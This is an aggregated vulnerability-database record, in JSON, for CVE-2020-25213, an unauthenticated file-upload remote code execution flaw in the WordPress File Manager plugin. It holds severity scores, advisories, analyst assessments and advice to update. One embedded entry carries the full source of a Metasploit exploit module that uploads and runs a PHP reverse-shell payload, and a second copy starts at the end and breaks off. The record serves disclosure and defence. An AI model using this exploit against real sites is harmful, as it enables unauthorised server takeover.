The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.
{"id": "CVE-2020-25213", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2020-25213", "description": "The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.", "published": "2020-09-09T16:15:00", "modified": "2022-01-01T18:37:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-25213", "reporter": "cve@mitre.org", "references": ["https://plugins.trac.wordpress.org/changeset/2373068", "https://hotforsecurity.bitdefender.com/blog/wordpress-websites-attacked-via-file-manager-plugin-vulnerability-24048.html", "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug/", "https://wordpress.org/plugins/wp-file-manager/#developers", "https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/", "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/", "https://github.com/w4fz5uck5/wp-file-manager-0day", "http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html"], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2022-03-23T15:45:16", "viewCount": 566, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0869"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "exploitdb", "idList": ["EDB-ID:49178"]}, {"type": "githubexploit", "idList": ["21A5FEEE-9C4D-52D3-BCE6-7EABF0888631", "6D0B2EF0-7703-5E2D-9FF7-57C0B047B5ED"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-HTTP-WP_FILE_MANAGER_RCE-"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "patchstack", "idList": ["PATCHSTACK:22CAF9945B1CE625DD44B6A478A41801"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "zdt", "idList": ["1337DAY-ID-35215"]}]}, "exploitation": {"wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}], "wildExploited": true}, "score": {"value": 6.3, "vector": "NONE"}, "twitter": {"counter": 28, "tweets": [{"link": "https://twitter.com/XopxeCG/status/1358903419994570752", "text": "Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213) https://t.co/ZLxlYOLA9h?amp=1"}, {"link": "https://twitter.com/UpsidedownCanuk/status/1358930208934424576", "text": "Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213)\nhttps://t.co/1J31cDM3SY?amp=1"}, {"link": "https://twitter.com/VulmonFeeds/status/1369454538177011714", "text": "CVE-2020-25213\n\nThe File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to ha...\n\nhttps://t.co/Nf5iblcMjP?amp=1"}, {"link": "https://twitter.com/UpsidedownCanuk/status/1358931800635056129", "text": "Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213) posted by AlienVault on /alienvault OTX: /pulse/6021a425750b50dafcc48a26/"}, {"link": "https://twitter.com/PVynckier/status/1361545905615351808", "text": "CVE-2020-25213: Critical Vulnerability in File Manager WordPress Plugin Exploited in the Wild - Blog | Tenable\u00ae"}, {"link": "https://twitter.com/hackingcoil/status/1359157041080713222", "text": "Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213) \nFebruary 7, 2021\n/hashtag/Malware_updates?src=hashtag_click\nhttps://t.co/7M3Ro4ZFZ2?amp=1"}, {"link": "https://twitter.com/DeliveredDATA/status/1358886320295313409", "text": "Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213) https://t.co/PAw6pBzf2e?amp=1"}, {"link": "https://twitter.com/F5Labs/status/1390011935358394371", "text": "Web attacks against Argentina, Brazil, Chile, Colombia, and Panama are looking for CVE-2020-15505, CVE-2017-9841, CVE-2020-25213, CVE-2018-20062, CVE-2020-20578, and many more. /hashtag/Latin?src=hashtag_click America. Story from /dunsany and Malcolm Heath. https://t.co/qtacjjJMu2?amp=1"}, {"link": "https://twitter.com/F5Labs/status/1391513334743244805", "text": "Web attacks against Argentina, Brazil, Chile, Colombia, and Panama are looking for CVE-2020-15505, CVE-2017-9841, CVE-2020-25213, CVE-2018-20062, CVE-2020-20578, and many more. /hashtag/Latin?src=hashtag_click America. Story from /dunsany and Malcolm Heath. https://t.co/Faql9DIUY3?amp=1"}, {"link": "https://twitter.com/VulmonFeeds/status/1428679573261242368", "text": "CVE-2020-25213\n\nThe File Manager (wp-file-manager) plugin before 6.9 for WordPress allow...\n\nhttps://t.co/Nf5iblcMjP?amp=1\n\nVulnerability Notification: https://t.co/xhLrNnfyrO?amp=1"}], "modified": "2021-04-23T01:09:38"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0869"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "exploitdb", "idList": ["EDB-ID:49178"]}, {"type": "githubexploit", "idList": ["21A5FEEE-9C4D-52D3-BCE6-7EABF0888631", "6D0B2EF0-7703-5E2D-9FF7-57C0B047B5ED"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "zdt", "idList": ["1337DAY-ID-35215"]}]}, "affected_software": {"major_version": [{"name": "webdesi9 file manager", "version": 6}]}, "vulnersScore": 6.3}, "_state": {"wildexploited": 0, "dependencies": 1660004461, "score": 1659882119, "cisa_kev_wildexploited": 1660152412, "affected_software_major_version": 1671590614}, "_internal": {"score_hash": "4277d2fa95ae2830f689fa0e92694251"}, "cna_cvss": {"cna": "MITRE", "cvss": {"3": {"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "score": 10.0}}}, "cpe": [], "cpe23": [], "cwe": ["CWE-434"], "affectedSoftware": [{"cpeName": "webdesi9:file_manager", "version": "6.9", "operator": "lt", "name": "webdesi9 file manager"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:webdesi9:file_manager:6.9:*:*:*:*:wordpress:*:*", "versionEndExcluding": "6.9", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://plugins.trac.wordpress.org/changeset/2373068", "name": "https://plugins.trac.wordpress.org/changeset/2373068", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"]}, {"url": "https://hotforsecurity.bitdefender.com/blog/wordpress-websites-attacked-via-file-manager-plugin-vulnerability-24048.html", "name": "https://hotforsecurity.bitdefender.com/blog/wordpress-websites-attacked-via-file-manager-plugin-vulnerability-24048.html", "refsource": "MISC", "tags": ["Third Party Advisory"]}, {"url": "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug/", "name": "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug/", "refsource": "MISC", "tags": ["Press/Media Coverage", "Third Party Advisory"]}, {"url": "https://wordpress.org/plugins/wp-file-manager/#developers", "name": "https://wordpress.org/plugins/wp-file-manager/#developers", "refsource": "MISC", "tags": ["Product", "Third Party Advisory"]}, {"url": "https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/", "name": "https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/", "name": "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/w4fz5uck5/wp-file-manager-0day", "name": "https://github.com/w4fz5uck5/wp-file-manager-0day", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html", "name": "http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}], "product_info": []}
{"patchstack": [{"lastseen": "2022-06-01T19:34:27", "description": "Unauthenticated Arbitrary File Upload leading to RCE vulnerability found by w4fz5uck5 in WordPress File Manager plugin (versions <= 6.8).\n\n## Solution\n\n\r\n Update the WordPress File Manager plugin to the latest available version (at least 6.9).\r\n ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-01T00:00:00", "type": "patchstack", "title": "WordPress File Manager plugin <= 6.8 - Unauthenticated Arbitrary File Upload leading to RCE vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25213"], "modified": "2020-09-01T00:00:00", "id": "PATCHSTACK:22CAF9945B1CE625DD44B6A478A41801", "href": "https://patchstack.com/database/vulnerability/wp-file-manager/wordpress-file-manager-plugin-6-8-unauthenticated-arbitrary-file-upload-leading-to-rce-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2021-02-15T22:21:15", "description": "Seravo noticed multiple cases where WordPress sites were breached using 0-day in wp-file-manager (confirmed with v6.8, which was the latest version available in wordpress.org). File lib/php/connector.minimal.php can be by default opened directly, and this file loads lib/php/elFinderConnector.class.php which reads POST/GET variables, and then allows executing some internal features, like uploading files. PHP is allowed, thus this leads to unauthenticated arbitrary file upload and remote code execution. It seems that this vulnerability was originally discovered and published publicly on Twitter on August 26th (see references), and was later seen being exploited in the wild by Seravo.\n\n### PoC\n\nhttps://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py \n \n\n", "cvss3": {}, "published": "2020-09-01T00:00:00", "type": "wpvulndb", "title": "File Manager 6.0-6.9 - Unauthenticated Arbitrary File Upload leading to RCE", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2020-25213"], "modified": "2020-12-02T14:48:23", "id": "WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9", "href": "https://wpscan.com/vulnerability/e528ae38-72f0-49ff-9878-922eff59ace9", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2021-12-10T14:55:51", "description": "# WPKiller v1.0 \u2714\n\nWordpress Security Scanner, WPKiller Allows y...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-13T14:47:27", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Webdesi9 File Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25213"], "modified": "2021-04-26T06:21:07", "id": "21A5FEEE-9C4D-52D3-BCE6-7EABF0888631", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T01:37:37", "description": "# WP-file-manager expoit [CVE-2020-25213](https://nvd.nist.gov/v...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-10T17:50:01", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Webdesi9 File Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25213"], "modified": "2022-08-17T00:07:01", "id": "6D0B2EF0-7703-5E2D-9FF7-57C0B047B5ED", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "zdt": [{"lastseen": "2021-12-22T05:18:58", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-10T00:00:00", "type": "zdt", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25213"], "modified": "2020-11-10T00:00:00", "id": "1337DAY-ID-35215", "href": "https://0day.today/exploit/description/35215", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HTTP::Wordpress\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\n 'Description' => %q{\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\n ],\n 'References' =>\n [\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\n [ 'CVE', '2020-25213' ]\n ],\n 'Platform' => [ 'php' ],\n 'Privileged' => false,\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n [\n 'WordPress File Manager 6.0-6.8',\n {\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\n }\n ]\n ],\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\n 'DefaultTarget' => 0\n )\n )\n register_options(\n [\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\n ]\n )\n end\n\n def check\n return CheckCode::Unknown unless wordpress_and_online?\n\n # check the plugin version from readme\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\n end\n\n def exploit\n # base path to File Manager plugin\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\n # filename of the file to be uploaded/created\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\n register_file_for_cleanup(filename)\n\n case datastore['COMMAND']\n when 'upload'\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\n when 'mkfile+put'\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\n end\n\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\n # execute the payload\n send_request_cgi('uri' => normalize_uri(payload_uri))\n end\n\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\n filename = opts['filename']\n\n # prep for exploit\n post_data = Rex::MIME::Message.new\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\n\n case elfinder_cmd\n when 'upload'\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\n when 'mkfile'\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\n when 'put'\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\n end\n\n res = send_request_cgi(\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\n 'method' => 'POST',\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n 'data' => post_data.to_s\n )\n\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\n end\nend\n", "sourceHref": "https://0day.today/exploit/35215", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:37:46", "description": "A remote code execution vulnerability exists in WordPress File Manager Plugin. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-29T00:00:00", "type": "checkpoint_advisories", "title": "WordPress File Manager Plugin Remote Code Execution (CVE-2020-25213)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25213"], "modified": "2020-09-29T00:00:00", "id": "CPAI-2020-0869", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2021-07-20T20:13:13", "description": "The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.\n\n \n**Recent assessments:** \n \n**space-r7** at November 10, 2020 3:10pm UTC reported:\n\nRating this as very high as this is a widespread Wordpress plugin, and the vulnerability is easily exploitable. The vulnerability is due to an example file, `lib/php/connector.minimal.php`, being left over in installations of the plugin. The file enables unauthenticated execution of select commands including an `upload` command that allows for file upload which can lead to code execution on the server.\n\nNote that disabling the plugin in Wordpress does not fix the vulnerability. The plugin should either be removed or updated to the patched version, which is `v6.9`.\n\n**wvu-r7** at September 29, 2020 8:28pm UTC reported:\n\nRating this as very high as this is a widespread Wordpress plugin, and the vulnerability is easily exploitable. The vulnerability is due to an example file, `lib/php/connector.minimal.php`, being left over in installations of the plugin. The file enables unauthenticated execution of select commands including an `upload` command that allows for file upload which can lead to code execution on the server.\n\nNote that disabling the plugin in Wordpress does not fix the vulnerability. The plugin should either be removed or updated to the patched version, which is `v6.9`.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-09-09T00:00:00", "type": "attackerkb", "title": "CVE-2020-25213", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25213"], "modified": "2020-09-15T00:00:00", "id": "AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197", "href": "https://attackerkb.com/topics/biVgLIkiSE/cve-2020-25213", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "WordPress File Manager Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25213"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-25213", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-11-10T15:38:59", "description": "", "cvss3": {}, "published": "2020-11-10T00:00:00", "type": "packetstorm", "title": "WordPress File Manager 6.8 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-25213"], "modified": "2020-11-10T00:00:00", "id": "PACKETSTORM:160003", "href": "https://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass 